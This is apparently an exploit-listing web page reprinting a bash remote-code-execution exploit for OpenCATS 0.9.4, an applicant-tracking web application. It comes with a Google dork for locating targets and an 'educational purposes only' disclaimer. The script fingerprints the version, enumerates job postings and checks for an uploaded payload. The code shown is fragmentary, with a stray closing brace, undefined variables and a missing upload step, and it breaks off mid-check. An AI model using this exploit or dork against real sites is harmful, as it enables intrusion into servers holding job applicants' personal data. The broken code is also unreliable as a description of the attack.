Exploits / Vulnerability Discovered : 2021-12-10 |
Type : webapps |
Platform : php
This exploit / vulnerability Opencats 0.9.4 remote code execution (rce) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: OpenCATS 0.9.4 - Remote Code Execution (RCE)
# Google Dork: intext:"Current Available Openings, Recently Posted Jobs"
# Date: 21/09/2021
# Exploit Author: Nicholas Ferreira - https://github.com/Nickguitar
# Vendor Homepage: https://www.opencats.org/
# Software Link: https://github.com/opencats/OpenCATS
# Version: <=0.9.4 Countach
# Tested on: Debian, CentOS, Windows Server
#!/bin/bash
if [ $# -eq 0 ]
then
echo "Usage: $0 <target URL>"
exit
fi
if [ -z "${ver}" ]
then
ver=`curl -skL "$1/installtest.php" | grep -Eio "CATS version is ([0-9]\.)+[0-9]*" | grep -Eo -m 1 "([0-9]\.)+[0-9]*"`
if [ -z "${ver}" ]
then
echo -e "${red}[-] Couldn't identity CATS version, but that's ok...${reset}"
return 0
fi
fi
echo -e "${green}[*] Version detected: $ver${reset}"
}
if [[ ! $numJb -gt 0 ]]
then
echo -e "${red}[-] No active jobs found.${reset}"
echo "[*] Trying another path..."
jbRequest=`curl -skL $target'/index.php?m=careers&p=showAll'`
numJb=`echo "$jbRequest" | grep "Posted Jobs" | sed -e 's/<[^>]*>//g' | sed -E 's/.*Posted Jobs.*: ([0-9]+).*/\1/'`
if [[ ! $numJb -gt 0 ]]
then
echo -e "${red}[-] Couldn't find any active job.${reset}"
exit
fi
fi
if ! `echo "$req" | egrep -q "still be uploaded|will be uploaded|$file"`
then
echo -e "${red}[-] Couldn't detect if payload was uploaded${reset}"
echo "[*] Checking by another method..."